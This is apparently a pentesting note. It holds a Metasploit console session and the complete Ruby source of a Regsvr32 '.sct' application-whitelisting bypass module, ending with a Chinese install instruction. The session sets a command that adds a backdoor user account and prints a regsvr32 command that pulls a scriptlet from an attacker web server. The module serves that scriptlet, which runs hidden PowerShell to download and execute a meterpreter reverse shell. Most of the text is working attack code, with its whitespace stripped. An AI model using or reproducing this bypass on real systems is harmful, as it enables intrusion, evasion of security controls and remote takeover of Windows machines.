msfauxiliary(server/regsvr32_command_delivery_server) >useauxiliary/server/regsvr32_command_delivery_servermsfauxiliary(server/regsvr32_command_delivery_server) >setCMDnetuserMicropoorMicropoor/addCMD =>netuserMicropoorMicropoor/addmsfauxiliary(server/regsvr32_command_delivery_server) >exploit[*] Using URL: http://0.0.0.0:8080/ybn7xESQYCGv[*] Local IP: http://192.168.1.4:8080/ybn7xESQYCGv[*] Server started.[*] Run the following command on the target machine:regsvr32/s/n/u/i:http://192.168.1.4:8080/ybn7xESQYCGvscrobj.dll
### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit‐framework## classMetasploitModule<Msf::Exploit::RemoteRank=ManualRankingincludeMsf::Exploit::PowershellincludeMsf::Exploit::Remote::HttpServerdefinitialize(info= {})super(update_info(info,'Name'=>'Regsvr32.exe (.sct) Application Whitelisting Bypass Serve r','Description'=>%q(Thismodule simplifies the Regsvr32.exe ApplicationWhitelistingBypass technique.The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command.
This command then downloads and executes the specified payload (similar to the web_delivery module with PSH).Both web requests (i.e., the .sct file andPowerShell download and execute) can occur on the same port.),'License'=>MSF_LICENSE,'Author'=>['Casey Smith',# AppLocker bypass research and vulnerability discover y(\@subTee)'Trenton Ivey',# MSF Module (kn0)],'DefaultOptions'=>{'Payload'=>'windows/meterpreter/reverse_tcp'},'Targets'=> [['PSH', {}]],'Platform'=>%w(win),'Arch'=> [ARCH_X86,ARCH_X86_64],'DefaultTarget'=>0,'DisclosureDate'=>'Apr 19 2016','References'=>[['URL','http://subt0x10.blogspot.com/2016/04/bypass‐application‐whitelisting‐script.html']]))enddefprimerprint_status('Run the following command on the target machine:')print_line("regsvr32 /s /n /u /i:\#{get_uri}.sct scrobj.dll")enddefon_request_uri(cli, _request)# If the resource request ends with '.sct', serve the .sct file# Otherwise, serve the PowerShell payloadif _request.raw_uri =~/\.sct$/serve_sct_fileelseserve_psh_payloadendenddefserve_sct_fileprint_status("Handling request for the .sct file from #{cli.peerhost}")ignore_cert =Rex::Powershell::PshMethods.ignore_ssl_certificate if ssldownload_string =Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(get_uri)download_and_run ="#{ignore_cert}#{download_string}"psh_command = generate_psh_command_line(noprofile: true,windowstyle: 'hidden',command: download_and_run)data = gen_sct_file(psh_command)send_response(cli, data,'Content‐Type'=>'text/plain')enddefserve_psh_payloadprint_status("Delivering payload to #{cli.peerhost}")data = cmd_psh_payload(payload.encoded,payload_instance.arch.first,remove_comspec: true,use_single_quotes: true)send_response(cli,data,'Content‐Type'=>'application/octet‐stream')enddefrand_class_id"#{Rex::Text.rand_text_hex 8}‐#{Rex::Text.rand_text_hex 4}‐#{Rex::Text.rand_text_hex 4}‐#{Rex::Text.rand_text_hex 4}‐#{Rex::Text.rand_text_hex12}"
enddefgen_sct_file(command)%{<?XML version="1.0"?><scriptlet><registrationprogid="\#{rand_text_a lphanumeric 8}"classid="{#{rand_class_id}}"><script><![CDATA[ var r = ne wActiveXObject("WScript.Shell").Run("#{command}",0);]]><script></registration></scriptlet>}
endend
使用方法:
copy regsvr32_applocker_bypass_server.rb to /usr/share/metasploit-framework/modules/exploits/windows/misc
